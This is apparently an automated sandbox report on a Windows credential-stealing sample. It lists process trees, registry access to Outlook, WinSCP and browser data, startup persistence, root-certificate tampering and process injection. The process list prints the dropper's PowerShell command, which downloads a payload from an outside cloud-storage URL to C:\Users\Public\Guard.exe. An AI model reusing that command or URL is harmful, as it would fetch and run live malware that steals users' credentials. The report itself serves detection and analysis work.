Malware Analysis Report

2024-12-01 03:02

Sample ID 241107-3tey4azhnm
Target c96a43db0abf02b0db8ca6efc658dc38.exe
SHA256 e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172
Tags execution, collection, discovery, spyware, stealer
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256

e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172

Threat Level: Known bad

The file c96a43db0abf02b0db8ca6efc658dc38.exe was found to be: Known bad.

Malicious Activity Summary

execution, collection, discovery, spyware, stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Reads WinSCP keys stored on the system

Reads user/profile data of web browsers

Executes dropped EXE

Loads dropped DLL

Drops startup file

Checks installed software on the system

Accesses Microsoft Outlook profiles

Accesses Microsoft Outlook accounts

Drops file in System32 directory

Suspicious use of SetThreadContext

AutoIT Executable

Drops file in Program Files directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Program crash

Suspicious use of SendNotifyMessage

Modifies registry class

Suspicious behavior: EnumeratesProcesses

outlook_office_path

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Checks processor information in registry

outlook_win_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-07 23:48

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-07 23:48

Reported

2024-11-07 23:50

Platform

win7-20241010-en

Max time kernel

14s

Max time network

18s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c96a43db0abf02b0db8ca6efc658dc38.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\c96a43db0abf02b0db8ca6efc658dc38.exe

"C:\Users\Admin\AppData\Local\Temp\c96a43db0abf02b0db8ca6efc658dc38.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:slight-stood/:web_1/web" -OutFile "C:\Users\Public\Guard.exe""

Network

N/A

Files

memory/2076-4-0x000007FEF643E000-0x000007FEF643F000-memory.dmp

memory/2076-5-0x000000001B230000-0x000000001B512000-memory.dmp

memory/2076-7-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

memory/2076-6-0x0000000001F40000-0x0000000001F48000-memory.dmp

memory/2076-8-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

memory/2076-9-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

memory/2076-10-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

memory/2076-11-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

memory/2076-12-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-07 23:48

Reported

2024-11-07 23:50

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

138s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1060 created 3504 N/A C:\Users\Public\Guard.exe C:\Windows\Explorer.EXE
PID 1060 created 3504 N/A C:\Users\Public\Guard.exe C:\Windows\Explorer.EXE
PID 2348 created 3504 N/A C:\Users\Public\jsc.exe C:\Windows\Explorer.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\jsc.exe N/A
N/A N/A C:\Users\Public\jsc.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\rundll32.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\SysWOW64\rundll32.exe N/A

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2348 set thread context of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2256 set thread context of 4924 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 1156 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 2008 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 4312 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 5004 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 3724 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 1832 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 864 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 2040 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 5100 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 3136 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 428 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 3716 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 2984 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 set thread context of 1396 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe C:\Windows\SysWOW64\rundll32.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Public\jsc.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\Guard.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\jsc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\jsc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\rundll32.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\rundll32.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Windows\SysWOW64\rundll32.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information C:\Windows\SysWOW64\rundll32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\9C861E8CA7BC60FED57FD39F7A533C075EE77CA7 C:\Windows\SysWOW64\rundll32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\9C861E8CA7BC60FED57FD39F7A533C075EE77CA7\Blob = [certificate blob value omitted] C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\Guard.exe N/A
N/A N/A C:\Users\Public\jsc.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\jsc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\jsc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3700 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\c96a43db0abf02b0db8ca6efc658dc38.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3700 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\c96a43db0abf02b0db8ca6efc658dc38.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3700 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\c96a43db0abf02b0db8ca6efc658dc38.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3700 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\c96a43db0abf02b0db8ca6efc658dc38.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3528 wrote to memory of 1060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Guard.exe
PID 3528 wrote to memory of 1060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Guard.exe
PID 3528 wrote to memory of 1060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Guard.exe
PID 1060 wrote to memory of 4716 N/A C:\Users\Public\Guard.exe C:\Windows\SysWOW64\cmd.exe
PID 1060 wrote to memory of 4716 N/A C:\Users\Public\Guard.exe C:\Windows\SysWOW64\cmd.exe
PID 1060 wrote to memory of 4716 N/A C:\Users\Public\Guard.exe C:\Windows\SysWOW64\cmd.exe
PID 1060 wrote to memory of 2348 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 1060 wrote to memory of 2348 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 1060 wrote to memory of 2348 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 1060 wrote to memory of 2348 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 1060 wrote to memory of 2348 N/A C:\Users\Public\Guard.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 2348 wrote to memory of 4512 N/A C:\Users\Public\jsc.exe C:\Users\Public\jsc.exe
PID 4512 wrote to memory of 4324 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\cmd.exe
PID 4512 wrote to memory of 4324 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\cmd.exe
PID 4512 wrote to memory of 4324 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\cmd.exe
PID 4324 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4324 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4324 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4512 wrote to memory of 2256 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\rundll32.exe
PID 4512 wrote to memory of 2256 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\rundll32.exe
PID 4512 wrote to memory of 2256 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\rundll32.exe
PID 2256 wrote to memory of 4924 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 4924 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 4924 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 1156 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 1156 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 1156 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 2008 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
